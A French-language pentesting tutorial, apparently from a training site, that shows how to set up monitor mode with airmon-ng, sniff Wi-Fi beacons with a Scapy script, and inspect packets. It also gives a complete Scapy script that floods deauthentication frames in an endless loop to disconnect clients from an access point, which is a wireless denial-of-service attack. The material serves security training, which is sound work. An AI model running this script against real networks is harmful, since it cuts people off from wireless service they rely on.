Analyser les réseaux sans fil est crucial pour la sécurité, mais cela peut être complexe.
Sans les bons outils, cette tâche peut devenir inefficace, exposant les réseaux à des vulnérabilités.
Cet article explore l’utilisation de Python et Scapy pour une analyse efficace et sécurisée des réseaux sans fil.
Initiez-vous aux fondamentaux de Python pour devenir pentesteur.

L’objectif de cette partie est de démontrer comment utiliser Python et Scapy pour analyser les réseaux sans fil à votre portée. Nous aborderons plusieurs aspects clés, y compris la configuration de l’environnement pour les tests, le sniffing des réseaux sans fil pour capturer les données, et les techniques de désauthentification des utilisateurs. Ces compétences sont essentielles pour comprendre la sécurité des réseaux sans fil et pour effectuer des évaluations de sécurité approfondies.
Configurer Python pour Réseaux Sans Fil
Pour commencer, nous aurons besoin d’une carte Wi-Fi externe capable de supporter le mode monitoring et l’injection de paquets. Les cartes recommandées sont les cartes Alpha Networks, comme la AWS 036H.
- Vérifiez votre interface Wi-Fi :iwconfig
- Activez le mode monitoring :airmon-ng start wlan0
- Tuez les processus interférant :kill 535
- Vérifiez le nouveau nom de l’interface :iwconfig
- Utilisez`airodump-ng`pour scanner les réseaux :airodump-ng wlan0mon
Sniffing Wi-Fi avec Scapy et Python
Nous allons utiliser Scapy pour analyser les réseaux sans fil environnants. Scapy est un module Python puissant pour la manipulation de paquets réseau.
Installation de Scapy
Si vous ne l’avez pas déjà installé, vous pouvez installer Scapy avec la commande suivante :
pip install scapy
Script de Sniffing de Réseaux Wi-Fi
Voici un script Python pour détecter les points d’accès Wi-Fi à proximité :
from scapy.all import *
ap_list = []
iface = "wlan0mon"
defparsePacker(pkt):
ifpkt.haslayer(Dot11):
ifpkt.type == 0 andpkt.subtype == 8:
ifpkt.addr2 not in ap_list:
#print pkt.show()
ap_list.append(pkt.addr2)
print("BSSID : %s --- SSID : %s " % (pkt.addr2,pkt.info))
sniff(iface=iface,prn=parsePacker,count=50,timeout=10)
Info :
– `Dot11` : C’est la couche des paquets 802.11.
– `pkt.type == 0 and pkt.subtype == 8` : Filtre les paquets de type beacon.
– `pkt.info` : Contient le SSID du réseau.
– `pkt.addr2` : Contient l’adresse MAC (BSSID) du point d’accès.
Analyse de Paquets Réseaux Sans Fil
Scapy permet également de visualiser les paquets de manière détaillée. Voici comment procéder :
Étape | Commande | Description |
---|---|---|
1. Définir l’interface de sniffing | conf.iface = « wlan0mon » | Configure l’interface réseau à utiliser pour le sniffing. |
2. Sniffer quelques paquets | pkts = sniff(count=10) | Capture 10 paquets sur l’interface configurée. |
3. Afficher les paquets capturés | pkts | Affiche les paquets capturés. |
4. Résumé des paquets capturés | pkts.summary() | Affiche un résumé des paquets capturés. |
5. Générer un PDF pour un paquet | pkts[0].pdfdump() | Génère un fichier PDF avec les détails du premier paquet capturé. |
Désauthentification Wi-Fi et Sécurité
Définition : Une attaque de désauthentification est une attaque de déni de service (DoS) sur les réseaux sans fil. Elle force les utilisateurs à se déconnecter du point d’accès.
Script de Désauthentification
Voici un script pour envoyer des paquets de désauthentification :
from scapy.all import *
ap = "e8:cc:18:a0:58:e5"
clients = "FF:FF:FF:FF:FF:FF"
client = "aa:aa:aa:aa:aa:aa"
pkt = RadioTap()/Dot11(addr1=ap,addr2=clients,addr3=clients)/Dot11Deauth()
pkt1 = RadioTap()/Dot11(addr1=ap,addr2=client,addr3=client)/Dot11Deauth()
while 1:
sendp(pkt,iface="wlan0mon")
sendp(pkt1,iface="wlan0mon")
Info :
– `RadioTap()` : Ajoute un en-tête RadioTap pour les paquets 802.11.
– `Dot11Deauth()` : Spécifie que le paquet est une trame de désauthentification.
– `sendp()` : Envoie les paquets sur l’interface spécifiée.
Dans cette partie, nous avons exploré l’utilisation de Python et Scapy pour analyser les réseaux sans fil, y compris les techniques de sniffing et de désauthentification des utilisateurs. Ces méthodes sont puissantes pour tester la sécurité des réseaux sans fil et identifier les vulnérabilités potentielles. Cependant, il est crucial d’utiliser ces techniques de manière éthique et légale, en respectant toujours les règles de confidentialité et les lois en vigueur pour assurer une utilisation responsable des outils de sécurité.
Formez-vous gratuitement avec Alphorm !
Maîtrisez les compétences clés en IT grâce à nos formations gratuites et accélérez votre carrière dès aujourd'hui.
FAQ
Comment configurer l'environnement pour analyser les réseaux sans fil ?
Quelles sont les étapes pour effectuer un sniffing de réseaux Wi-Fi ?
Comment visualiser et analyser les paquets capturés avec Scapy ?
Qu'est-ce qu'une attaque de désauthentification et comment la réaliser ?
Pourquoi l'éthique est-elle importante lors des tests de sécurité des réseaux ?
Conclusion
Les techniques décrites ici pour analyser les réseaux sans fil sont puissantes et doivent être utilisées avec responsabilité. Quelles autres méthodes pourraient renforcer la sécurité des réseaux sans fil ?